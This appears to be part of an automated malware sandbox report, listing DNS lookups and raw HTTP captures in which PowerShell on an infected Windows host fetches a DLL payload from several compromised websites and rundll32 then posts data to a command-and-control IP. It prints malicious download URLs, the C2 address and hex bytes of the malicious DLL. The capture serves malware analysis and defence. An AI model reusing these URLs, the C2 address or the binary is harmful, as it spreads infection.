                                        Jan 7, 2021 18:36:10.618753910 CET8.8.8.8192.168.2.220x4aa4No error (0)padreescapes.com66.153.205.191A (IP address)IN (0x0001)
                                        Jan 7, 2021 18:36:11.131052017 CET8.8.8.8192.168.2.220x70c0No error (0)sarture.com173.255.195.246A (IP address)IN (0x0001)
                                        Jan 7, 2021 18:36:11.900259018 CET8.8.8.8192.168.2.220x3714No error (0)seo.udaipurkart.com103.92.235.25A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • hangarlastik.com
                                        • padreescapes.com
                                        • sarture.com
                                        • seo.udaipurkart.com
                                        • 5.2.136.90

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.224916789.252.164.5880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 7, 2021 18:36:10.348764896 CET0OUTGET /cgi-bin/Ui4n/ HTTP/1.1
                                        Host: hangarlastik.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:10.431408882 CET1INHTTP/1.1 302 Found
                                        Date: Thu, 07 Jan 2021 17:36:09 GMT
                                        Server: Apache
                                        Location: http://hangarlastik.com/cgi-sys/suspendedpage.cgi
                                        Content-Length: 233
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 68 61 6e 67 61 72 6c 61 73 74 69 6b 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://hangarlastik.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                        Jan 7, 2021 18:36:10.435518026 CET1OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                        Host: hangarlastik.com
                                        Jan 7, 2021 18:36:10.527239084 CET1INHTTP/1.1 200 OK
                                        Date: Thu, 07 Jan 2021 17:36:09 GMT
                                        Server: Apache
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html
                                        Jan 7, 2021 18:36:10.534745932 CET2INData Raw: 31 64 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e
                                        Data Ascii: 1dca<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Ex
                                        Jan 7, 2021 18:36:10.534810066 CET4INData Raw: 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20
                                        Data Ascii: eft; word-break: break-all; width: 100%; } .status-reason { font-size: 200%; display: block; color: #CCCCCC; } .reason-text { margin: 20px
                                        Jan 7, 2021 18:36:10.534853935 CET5INData Raw: 2f 2f 2f 2f 2f 35 2b 66 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 36 2b 76 72 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                        Data Ascii: /////5+fn////////////////////////////////6+vr///////////////////////////////////////+i5edTAAAAPXRSTlMAAQECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygoKSorLC0uLzAwMTIzNDU2Nzg5H7x0XAAACndJREFUeAHtXXlzGs8R7TQ3CFkHxpKxhIwtIBwgIuYY4u//uVJ2q
                                        Jan 7, 2021 18:36:10.534890890 CET6INData Raw: 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48 43 6d 30 71 45 76 45 5a 39 43 37 76 44 59 5a 65 57 41 51 68 6e 4b 6b 51 55 47 2f
                                        Data Ascii: qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7P9NwZ7CgAeDjlaM9ktAD0+Mxwrs
                                        Jan 7, 2021 18:36:10.534928083 CET8INData Raw: 32 6d 42 4e 36 49 32 35 6e 32 43 54 42 4f 4f 52 45 30 2f 36 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52
                                        Data Ascii: 2mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL
                                        Jan 7, 2021 18:36:10.534961939 CET9INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20
                                        Data Ascii: } .reason-text { font-size: 160%; } } </style> </head> <body> <div class="container"> <span class="status-reason"> <i class="fas fa-us
                                        Jan 7, 2021 18:36:10.535372972 CET9INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.224916866.153.205.19180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 7, 2021 18:36:10.774549007 CET9OUTGET /blog/0I/ HTTP/1.1
                                        Host: padreescapes.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:10.933862925 CET11INHTTP/1.1 401 Unauthorized
                                        Content-Type: text/html
                                        Server:
                                        WWW-Authenticate: Negotiate
                                        WWW-Authenticate: NTLM
                                        X-Content-Type-Options: nosniff
                                        X-Xss-Protection: 1; mode=block
                                        Date: Thu, 07 Jan 2021 17:36:10 GMT
                                        Content-Length: 1293
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 31 20 2d 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 41 63 63 65 73 73 20 69 73 20 64 65 6e 69 65 64 20 64 75 65 20 74 6f 20 69 6e 76 61 6c 69 64 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 31 20 2d 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 20 41 63 63 65 73 73 20 69 73 20 64
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>401 - Unauthorized: Access is denied due to invalid credentials.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>401 - Unauthorized: Access is d
                                        Jan 7, 2021 18:36:10.933907986 CET11INData Raw: 65 6e 69 65 64 20 64 75 65 20 74 6f 20 69 6e 76 61 6c 69 64 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 76 69 65 77 20 74
                                        Data Ascii: enied due to invalid credentials.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.2249169173.255.195.24680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 7, 2021 18:36:11.299278021 CET11OUTGET /wp-includes/JD8/ HTTP/1.1
                                        Host: sarture.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:11.466200113 CET12INHTTP/1.1 403 Forbidden
                                        Date: Thu, 07 Jan 2021 17:36:11 GMT
                                        Server: Apache
                                        Content-Length: 199
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.2249170103.92.235.2580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 7, 2021 18:36:12.062374115 CET13OUTGET /rx-5700-6hnr7/Sgms/ HTTP/1.1
                                        Host: seo.udaipurkart.com
                                        Connection: Keep-Alive
                                        Jan 7, 2021 18:36:12.229958057 CET14INHTTP/1.1 200 OK
                                        Date: Thu, 07 Jan 2021 17:35:31 GMT
                                        Server: Apache
                                        X-Powered-By: PHP/7.3.11
                                        Cache-Control: no-cache, must-revalidate
                                        Pragma: no-cache
                                        Expires: Thu, 07 Jan 2021 17:35:31 GMT
                                        Content-Disposition: attachment; filename="mNGc8tNL7Bzy48w3L1.dll"
                                        Content-Transfer-Encoding: binary
                                        Set-Cookie: 5ff74663e945f=1610040931; expires=Thu, 07-Jan-2021 17:36:31 GMT; Max-Age=60; path=/
                                        Last-Modified: Thu, 07 Jan 2021 17:35:31 GMT
                                        Keep-Alive: timeout=6, max=100
                                        Connection: Keep-Alive
                                        Transfer-Encoding: chunked
                                        Content-Type: application/octet-stream
                                        Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
                                        Jan 7, 2021 18:36:12.230010033 CET15INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jan 7, 2021 18:36:12.230046988 CET17INData Raw: 00 10 b8 01 00 00 00 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc e9 cb 10 00 00 cc cc cc cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00
                                        Data Ascii: ]USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+M
                                        Jan 7, 2021 18:36:12.230084896 CET18INData Raw: 33 c0 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 85 f6 74 7c 83 7e 10 00 74 11 8b 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff
                                        Data Ascii: 3[]UVut|~tN@(jjQ~t:W39~~Ftv(PF$G;~|F_thjPFthjPVjxPt^]UEHMx|ujl3]PxDUEtztSVuWuB
                                        Jan 7, 2021 18:36:12.230122089 CET20INData Raw: 0f 33 c0 39 45 0c 5b 0f 94 c0 8b e5 5d c2 08 00 8b 9b a0 00 00 00 03 d9 89 5d 08 8b 03 85 c0 74 65 56 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81
                                        Data Ascii: 39E[]]teVWI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFN
                                        Jan 7, 2021 18:36:12.230169058 CET21INData Raw: ec 10 53 56 57 8b 7d 08 83 7f 08 00 0f 85 cd 00 00 00 8d 5f 10 53 68 c0 d4 00 10 6a 01 6a 00 68 b0 d4 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0
                                        Data Ascii: SVW}_ShjjhWfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]
                                        Jan 7, 2021 18:36:12.230211020 CET22INData Raw: 89 0d 00 00 00 00 59 5e 8b 4d f0 33 cd e8 20 0f 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40
                                        Data Ascii: Y^M3 ]UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtEx5VWXVOutE_^[]3[]U
                                        Jan 7, 2021 18:36:12.230249882 CET24INData Raw: 8b 45 ec 6a 00 8b 40 1c 8d 55 dc 8b 08 52 68 ec e3 00 10 50 ff 51 2c 8b f0 8d 45 dc 50 ff 15 b0 d1 00 10 ff 75 f8 ff 15 64 d1 00 10 8b 45 fc 50 8b 08 ff 51 08 8b 45 fc 50 8b 08 ff 51 08 57 ff 15 64 d1 00 10 8b c6 5e 5f 8b e5 5d c3 cc cc cc cc cc
                                        Data Ascii: Ej@URhPQ,EPudEPQEPQWd^_]U0X!3ESVWCMQPR3~;}suCURWPQx\CURURPQ xE}u?CURWUfEfERPQxEPEP'
                                        Jan 7, 2021 18:36:12.230292082 CET25INData Raw: f8 fb ff ff 80 b8 6a 02 00 00 00 75 3f 6a 13 68 7c e3 00 10 57 ff 15 a8 d1 00 10 85 c0 74 20 68 a4 e3 00 10 57 ff 15 9c d1 00 10 85 c0 75 10 68 c8 e3 00 10 57 ff 15 9c d1 00 10 85 c0 74 0d 8b 85 f8 fb ff ff c6 80 6a 02 00 00 01 8b 4d fc 33 c0 81
                                        Data Ascii: ju?jh|Wt hWuhWtjM3D_3^Y]UX!3EES]VEW}EPWhP3x=wuz3fEuPuj
                                        Jan 7, 2021 18:36:12.230329990 CET26INData Raw: b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e7 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 f7 c6 07 00 00 00 74 63 0f ba e6 03 0f 83 b2 00 00 00 66 0f 6f 4e f4 8d
                                        Data Ascii: svs~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0foF fon0v00fof:ffof:fGfof:fo
                                        Jan 7, 2021 18:36:12.390563965 CET28INData Raw: 80 00 00 00 4a 75 a3 85 c9 74 4f 8b d1 c1 ea 04 85 d2 74 17 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 7f 07 8d 76 10 8d 7f 10 4a 75 ef 83 e1 0f 74 2a 8b c1 c1 e9 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 49 75 f3 8b c8 83 e1 03 74 0f 8a 06 88 07 46 47 49
                                        Data Ascii: JutOtfofvJut*tvIutFGIuX^_$++QtFGIutvHuYQT|YUAPEPYY@]UVEtVY^]U]


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.22491715.2.136.9080C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jan 7, 2021 18:36:34.758904934 CET214OUTPOST /1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ HTTP/1.1
                                        DNT: 0
                                        Referer: 5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/
                                        Content-Type: multipart/form-data; boundary=------------------kE9SOewkKUR6zpUliE
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 5.2.136.90
                                        Content-Length: 6772
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Jan 7, 2021 18:36:34.758992910 CET215OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6b 45 39 53 4f 65 77 6b 4b 55 52 36 7a 70 55 6c 69 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 78 50
                                        Data Ascii: --------------------kE9SOewkKUR6zpUliEContent-Disposition: form-data; name="xPEQIyC"; filename="JyaCvvAdlbZVRJGd"Content-Type: application/octet-streameD,j VC;A3*dXC"2m#CWA53bOrJ^|kAf
                                        Jan 7, 2021 18:36:34.831592083 CET219OUTData Raw: a1 ca 35 98 ac d3 b3 41 ef d2 70 7d ad b5 a2 0b 7c d4 5a cd a6 c6 a2 3f 43 35 3e f7 3d 8d 2e 07 f2 28 e9 c1 36 c3 a4 32 25 66 2d bb 18 38 e7 25 ef 76 d4 0f 36 11 9e bb 64 53 a0 55 d3 a0 25 61 f7 0d 5e 2f 2b 48 e6 a0 41 b8 3a 71 ec 9a a5 02 c5 0b
